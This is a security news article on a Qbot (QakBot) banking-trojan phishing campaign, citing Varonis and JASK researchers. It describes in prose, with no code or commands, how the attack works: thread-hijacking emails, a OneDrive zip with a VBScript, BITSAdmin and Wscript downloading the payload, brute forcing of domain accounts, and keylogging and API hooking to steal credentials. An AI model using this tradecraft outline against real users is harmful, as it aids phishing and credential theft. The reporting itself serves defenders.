Qbot, an information-stealing trojan that has been around for 10 years, has resurfaced again with a new phishing-based infection technique that is able to evade anti-spam defenses.
Varonis Security Research spotted the new global Qbot campaign in March.Researchers said they have positively identified 2,726 victims, based on analysis of one of the attacker’s servers. However, they suspect the actual number of victims is much higher. Researchers at JASK, on Tuesday, have released an analysis of the latest iteration of the Qbot malware.
Qbot, also known as QakBot, is known for its polymorphic behavior and its worm-like tendencies, such as being able to self-replicate via shared drives and removable media. This time around, QBot has been spreading through a phishing campaign targeting U.S. corporations and also victims in Europe, Asia, and South America.
The delivery mechanism for this variant of Qbot is phishing campaigns where victims receive an email containing a link to what appears to be an online document. Email purport to be an exiting email thread under the guise of the replying to a pre-existing business-based correspondence, according to JASK.
“This email was not blocked by an anti-spam gateway. It was a context-aware targeted response to an existing email thread,” wrote Greg Longo, senior threat analyst with JASK, in an email-based interview. He said the goal of the attacks are to steal proprietary financial information, including bank account credentials.
The infection technique is typical. A phishing email arrives with a link to a Microsoft OneDrive file that delivers a VBScript (Microsoft Visual Basic Scripting Edition) in a compressed Zip archive. If the archive is opened the attack spawns the legitimate BITSAdmin Windows utility. That triggers another native Windows utility, Wscript.exe, used to download the Qbot malware file “august.png” from the attacker’s server.
“This two-stage process is a common attack vector for actors to bypass security controls. Some security technologies will detonate links in an email so including a link to a ZIP archive is likely to get through (as opposed to a link straight to the malware),” Longo wrote.
Varonis Security Research noted previous Qbot attacks have utilized malicious Word document macros as a stage-one in attacks. Researchers also noted, this variant is unique in that the malware uses BITSAdmin to download the loader. This appears to be a new behavior, as previous samples used PowerShell. According to a Microsoft description, “BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.”
Post infection, according to Varonis, “the malware compromises a domain account, it enumerates the ‘Domain Users’ group and brute forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead.”
The goal of the malware is to siphon money from user accounts via stealing credential. Techniques and tools used are keylogging to steal credentials/cookies and the use of hooking. Hooking is where “the main payload injects to all the processes in the system with a code that hooks API calls and searches for financial/banking string the malware extracts the data, credentials, or session cookies from the process and uploads it to the attacker,” Varonis wrote.
Since 2009, when Qbot launched its first assault on computer networks, the malware has never completely vanished. Since then there have been sporadic reports of Qbot infections and variants causing limited infections. In 2016, criminals behind the trojan repurposed the original Qbot source code and tweaked it to with the ability to regenerate itself on an infected host every 24 hours. The malware was spotted in 2017 with a new tactic of locking users out of their Active Directory accounts by tying up systems via cycling through user and domain credentials in a dictionary attack.
Don’t miss our free Threatpost webinar, “Data Security in the Cloud,” on April 24 at 2 p.m. ET.
A panel of experts will join Threatpost senior editor Tara Seals to discuss how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS.